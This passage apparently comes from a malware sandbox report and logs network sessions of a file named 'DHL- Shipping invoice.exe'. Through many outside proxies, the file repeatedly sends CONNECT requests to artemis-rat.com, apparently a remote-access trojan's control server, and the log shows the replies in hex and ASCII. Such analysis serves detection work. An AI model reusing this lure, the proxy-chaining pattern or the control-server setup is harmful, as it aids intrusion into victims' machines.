                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            270192.168.2.451007172.67.182.83806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.967149019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.054837942 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            271192.168.2.450873178.54.21.20380816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.967469931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            272192.168.2.450979162.241.46.40332686484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.969427109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.296605110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.624783993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.359311104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.750370979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.062923908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.359558105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953913927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.250088930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            273192.168.2.451011172.67.181.17806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.969717026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.057051897 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            274192.168.2.451012104.27.37.131806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.970110893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.057109118 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            275192.168.2.450086184.178.172.2341456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.973974943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            276192.168.2.450796157.230.250.185514996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.979646921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.655998945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.609159946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640748978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453567982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            277192.168.2.450909173.249.33.122630106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.982453108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.441174030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.968554974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.027293921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.216702938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.361625910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453571081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.736248016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141230106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            278192.168.2.45093718.133.16.21806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.982635021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.142577887 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:00.143096924 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1b 29 70 c7 87 fb 8a ad 85 e6 0d 5c 18 79 59 4f 55 37 c6 77 f3 be 06 ee 88 aa 9d 68 8d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e)p\yYOU7wh*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:00.300724983 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 a0 35 67 ee 7f d4 a2 2a d1 95 ed cd 93 e6 d0 f9 96 e6 20 65 9b dc 88 f9 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =95g* eDOWNGRD0000*H010Uartemis-rat.com0240312064921Z260312064921Z010Uartemis-rat.com0"0*H0*zH%JE,B#
                            Mar 12, 2024 08:37:00.483129025 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 4a c5 7a 4e 55 a7 93 a9 d4 3d 8d 8e 89 21 20 95 a0 5a 3c c6 2e ab 7c b1 3d ed 8d d3 e0 8e b7 31 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 1e 2c 77 64 42 6c a0 b9 58 bd 4d bb b9 24 42 02 93 fc bc 19 bf
                            Data Ascii: %! JzNU=! Z<.|=1(,wdBlXM$BaD-n
                            Mar 12, 2024 08:37:00.639723063 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 bd 9b 5c 99 d6 81 a6 7d 48 f6 dc 8a d9 91 18 82 35 61 03 b9 48 44 3a f8 5c 99 c2 bf e9 a3 6f d4 88 ff 44 04 dc 6d df e0
                            Data Ascii: (\}H5aHD:\oDm


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            279192.168.2.450770203.95.198.3580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.982635021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            280192.168.2.451029104.17.132.79806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.984947920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.071892977 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            281192.168.2.45082934.64.4.104806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.987997055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.369582891 CET1286INHTTP/1.1 404 Not Found
                            Content-Type: text/html; charset=UTF-8
                            Referrer-Policy: no-referrer
                            Content-Length: 1561
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32
                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2
                            Mar 12, 2024 08:37:00.369621038 CET430INData Raw: 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63
                            Data Ascii: ){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            282192.168.2.451034104.25.167.88806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.988869905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.076633930 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            283192.168.2.45090279.110.196.14580816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:59.991347075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            284192.168.2.450114201.71.2.1779996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
